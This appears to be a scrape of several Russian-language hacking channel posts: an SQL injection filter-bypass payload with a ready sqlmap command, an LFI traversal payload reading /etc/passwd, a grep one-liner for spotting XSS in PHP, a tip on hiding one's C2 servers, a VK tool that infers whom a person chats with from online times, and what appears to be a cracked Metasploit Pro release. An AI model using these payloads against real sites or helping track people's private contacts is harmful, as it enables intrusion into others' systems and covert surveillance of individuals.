#report #war

Bypassing SQL
*
payload:
8%20or%207250%3d0725
*
для sqlmap:
sqlmap -u 'https://OLOLO.com/anyfile.asp?id_test=8%20or%207250%3d07250' --dbs --random-agent ignore=500 - -code=200 -T tablename --columns -- no-cast
*

#sql #bypass

Грязный BASH
однострочник для быстрого обнаружения XSS в файлах PHP
*
rg --no-heading "echo.*\\\$_GET" | grep "\.php:" | grep -v -e "(\$_GET" -e "( \$_GET" -e "esc_" -e "admin_url" -e "(int)" -e htmlentities

LFI
*
Payload:
".%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"

В поисках malware инфраструктуры
*
Если вам интересно как ищут всякие opedir, или C&C со всякими cobalt-strike, havoc или малварь вроде dark comet, то есть интересная статья, в статье 11 примеров на базе censys.
*
Исходя из статьи, можно немного прикрыть свой C2 от любопытных глаз
*
Tracking Malware Infrastructure

#malware #c2

ВК диалоги - позволяет узнать, с кем переписывается человек в ВК.
Мониторятся интервалы времени, проведённые человеком (и его друзьями) онлайн во ВКонтакте.
Анализируется как одновременное появление онлайн (один написал другому), так и одновременное исчезнование из онлайна.
Для начала наблюдения необходимо только ввести ссылку на человека.

https://vkdia.com/

👉 Подписывайтесь на OSINT Беларусь

pwd - zer0daylab

Metasploit Pro 4.22.2 - Update 2023092901

#ricepro #stealer #c2

DevOps with SAP

#DevOps #eng

🖥 Репозиторий: WPScan — инструмент для сканирования безопасности WordPress

WPScan — это инструмент безопасности, специализирующийся на сканировании уязвимостей в веб-сайтах, построенных на платформе WordPress.

— Данный инструмент предоставляет возможность сканирования сайтов на наличие уязвимостей в темах, плагинах и конфигурации WordPress.

⏺ Ссылка на GitHub

#Vulnerabillity